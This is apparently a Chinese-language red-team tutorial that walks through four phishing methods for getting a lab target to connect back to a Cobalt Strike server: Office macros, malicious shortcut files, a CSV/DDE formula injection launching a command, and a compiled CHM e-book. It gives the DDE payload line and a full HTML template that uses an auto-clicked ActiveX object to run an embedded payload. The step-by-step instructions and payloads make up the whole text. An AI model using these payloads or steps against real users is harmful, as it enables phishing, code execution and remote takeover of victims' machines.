一、Office钓鱼攻击
1.首先来到我们的cs,新建一个监听
2.监听建立完成后来到:有效载荷--->office宏,然后选择我们新建的监听
3.点击生成后就会出现一下界面,然后点击复制宏代码。
4.在靶机上面新建一贯office的word文档,然后保证我们的宏可以被执行,依次点击:文件----->选项----->信任中心------->信任中心设置,点击启用。
5.然后来到:视图----->宏
6.然后将之前复制的宏代码粘贴进去,并保存。
7.保存时后选择是
8.然后保存后重启,靶机就上线了
二、lnk 快捷方式钓鱼
1.来到cs的攻击------>web投递,然后
2.接下来就是将生成的攻击语句复制
3.然后在我们的靶机上新建一个快捷方式,然后如图操作
然后打开新建的快捷方式的属性,如图操作
4.应用后双击,靶机就上线cs了
三、CSV 注入之 RCE
1.首先我们需要在我们的靶机创建一个的 Excel 然后我们来到:文件->选项->信任中心->外部内容,启用动态数据交换服务
2.然后将:=1+cmd|' /C calc'!A0粘贴进去
3.然后模拟用户打开表格,此时就会
四、CHM 电子书钓鱼
1.这里我们需要用到一个工具:https://www.zipghost.com/download/easychm/echmsetup.exe
2.我们到cs来到攻击--->web投递,制作一个攻击语句
3.接着复制制作好的命令
4.然后创建一个index.html文件,里面内容是将生成的 payload 嵌入到 index.html 中 powershell.exe 后面记得有逗号。
<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value="复制粘贴攻击语句">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>
4.然后创建两个文件夹,并把上面创建的index.html加进去。
5.然后打开我们之前下载好的工具,打开然后我们如图操作。
6.然后点击编译。桌面上就会生成一个chm文件
7.双击运行,靶机就上线cs了